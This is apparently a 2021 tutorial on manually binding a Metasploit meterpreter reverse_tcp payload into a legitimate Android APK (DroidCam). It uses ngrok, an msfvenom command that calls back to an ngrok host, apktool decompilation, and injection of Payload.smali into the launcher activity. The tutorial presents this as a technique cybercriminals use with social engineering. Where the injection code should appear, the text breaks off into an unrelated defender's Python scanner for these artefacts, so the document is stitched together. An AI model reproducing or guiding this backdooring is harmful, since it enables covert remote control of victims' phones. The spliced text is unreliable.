How to bind metasploit payload with APK in 2021 | Dansh | manually

How to bind payload with APK in 2021




This post is about manually embedding a payload into an Android APK.

Why Android?

As the chart on the left shows, Android is the most common smartphone operating system in the world; in India alone, approximately 90 percent of smartphone users run Android, whether the Lollipop or Nougat release. Because of Android's popularity and its security weaknesses, it has become the first choice of target for cybercriminals. A large number of Android users are not very familiar with Android security, which is another factor cybercriminals take advantage of: through social engineering, users are led to download backdoored applications that compromise their devices. In this article we are going to discuss a common technique that cybercriminals use to backdoor APKs.

DISCLAIMER: This tutorial/software is intended for educational purposes only. It should not be used for illegal activity. The author will not be responsible for the use thereof. Don’t be a jerk about it.

Getting Started

This tutorial assumes:

  • Basic knowledge of Linux.
  • A Debian-based system (Ubuntu, Kali Linux).
  • An original APK; I used DroidCam.
  • Apktool, Ngrok and Metasploit installed.


Fire up Ngrok!

What is ngrok: it exposes local servers behind NATs and firewalls to the public internet over secure tunnels.
Start by signing up to ngrok and getting your auth token. Download ngrok and unzip it:

unzip /path/to/ngrok.zip

Once ngrok is unzipped, make the binary executable:

sudo chmod +x ngrok

Now add your ngrok auth token with the following command:

./ngrok authtoken <YOUR_AUTH_TOKEN>


Once the auth token has been accepted, launch ngrok with the command below. You can change the port to whichever port you want to open.


./ngrok tcp 4411


Switching on necessary services

Open a new terminal and use the commands below to start the required services.

service postgresql start

service apache2 start

Metasploit Part

  1. Generate the Android payload

Type the command below to generate an Android payload that connects back through the ngrok tunnel (lhost and lport here are the public hostname and port that ngrok reported for the tunnel).

msfvenom -p android/meterpreter/reverse_tcp lhost=0.tcp.ngrok.io lport=12553 R > payload.apk


Now we have our malicious payload ready!


  • Embedding the payload

Now it is time to decompile both APKs. Open a new terminal and use the commands below to decompile them into new directories.

  • Decompiling the payload

apktool d -f payload.apk -o payload

  • Decompiling the original



Command explanation: the d option tells apktool to decompile the APK, -f overwrites the output of a previous decompilation, and -o sets the directory the decompiled files are written to.
Payload.smali

Now we need to copy the payload's smali file into the original APK's decompiled folder. The file is Payload.smali, found at payload/smali/com/metasploit/stage; copy it from there.

Next, create the same folder structure inside the original's decompiled folder: Original > smali > com > metasploit > stage.

Then paste the copied Payload.smali file at that location.





Now we need to find out which activity runs when the original app is launched; this information is stored in the AndroidManifest.xml file.


Open the AndroidManifest.xml file with your favorite text editor. In the file, we are looking for the following lines.

<action android:name="android.intent.action.MAIN"/>
<category android:name="android.intent.category.LAUNCHER"/>


The manifest is XML, so you will see the familiar tags and attributes. Look for an <activity> tag that contains both of these lines; you can use CTRL+F to search for them.



We can see that the entry activity is listed as com.dev47apps.droidcam.DroidCam. We know this because that activity's intent-filter contains “android.intent.action.MAIN”.


Follow the path smali > com > dev47apps > droidcam > DroidCam.smali.


Open DroidCam.smali in your favorite text editor.


Modify the Activity EntryPoint Smali File

Within the “DroidCam.smali” file, we are looking for the “onCreate()” method.

onCreate(Landroid/os/Bundle;)V

When you locate it, paste the following code on the line after it; this will start the payload alongside the original APK's code.
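From the defender's side, this procedure leaves two cheap-to-spot artefacts in a decompiled APK: the smali/com/metasploit/stage directory and a reference to that class inside the launcher activity's onCreate. The Python below is an added example, not code from the original post or from apktool/Metasploit; it finds the MAIN/LAUNCHER activity from AndroidManifest.xml the way the text describes, checks that activity's onCreate, and builds a constructed apktool-style tree for demonstration (the function names and the const-class stand-in line are this example's own, not anything from the page).

```python
import os, re, tempfile
import xml.etree.ElementTree as ET
NS = "{http://schemas.android.com/apk/res/android}"
STAGE_DIR = os.path.join("smali", "com", "metasploit", "stage")  # where the tutorial drops Payload.smali

def launcher_activity(manifest_path):
    """Fully qualified name of the activity whose intent-filter has MAIN + LAUNCHER, or None."""
    root = ET.parse(manifest_path).getroot()
    for act in root.iter("activity"):
        for flt in act.findall("intent-filter"):
            acts = {a.get(NS + "name") for a in flt.findall("action")}
            cats = {c.get(NS + "name") for c in flt.findall("category")}
            if "android.intent.action.MAIN" in acts and "android.intent.category.LAUNCHER" in cats:
                name = act.get(NS + "name", "")  # ".DroidCam" is relative to the package
                return root.get("package", "") + name if name.startswith(".") else name
    return None

def scan_decompiled_apk(apk_dir):
    """Return (launcher activity, findings) for an apktool output directory."""
    findings = []
    if os.path.isdir(os.path.join(apk_dir, STAGE_DIR)):
        findings.append("smali/com/metasploit/stage directory present")
    entry = launcher_activity(os.path.join(apk_dir, "AndroidManifest.xml"))
    smali = os.path.join(apk_dir, "smali", *entry.split(".")) + ".smali" if entry else ""
    if os.path.isfile(smali):
        text = open(smali, encoding="utf-8").read()
        # Inspect only the body of onCreate(Landroid/os/Bundle;)V, the hook point described above.
        m = re.search(r"\.method[^\n]*onCreate\(Landroid/os/Bundle;\)V(.*?)\.end method", text, re.S)
        if m and "Lcom/metasploit/stage/" in m.group(1):
            findings.append(entry + ".onCreate references com.metasploit.stage")
    return entry, findings
MANIFEST = ('<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.dev47apps.droidcam">'
            '<application><activity android:name=".DroidCam"><intent-filter>'
            '<action android:name="android.intent.action.MAIN"/><category android:name="android.intent.category.LAUNCHER"/>'
            '</intent-filter></activity></application></manifest>')
SMALI = (".class public Lcom/dev47apps/droidcam/DroidCam;\n.method protected onCreate(Landroid/os/Bundle;)V\n"
         "    invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V\n"
         "%s    return-void\n.end method\n")

def build_sample(tampered):
    """Constructed apktool-style tree (not a real DroidCam build); tampered=True adds both markers."""
    d = tempfile.mkdtemp()
    act_dir = os.path.join(d, "smali", "com", "dev47apps", "droidcam")
    os.makedirs(act_dir)
    with open(os.path.join(d, "AndroidManifest.xml"), "w") as f: f.write(MANIFEST)
    marker = "    const-class v0, Lcom/metasploit/stage/Payload;\n" if tampered else ""  # stand-in reference
    with open(os.path.join(act_dir, "DroidCam.smali"), "w") as f: f.write(SMALI % marker)
    if tampered: os.makedirs(os.path.join(d, STAGE_DIR))
    return d
```

Run scan_decompiled_apk against the output directory of apktool d on any APK you are examining; an empty findings list only means these two specific markers are absent.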





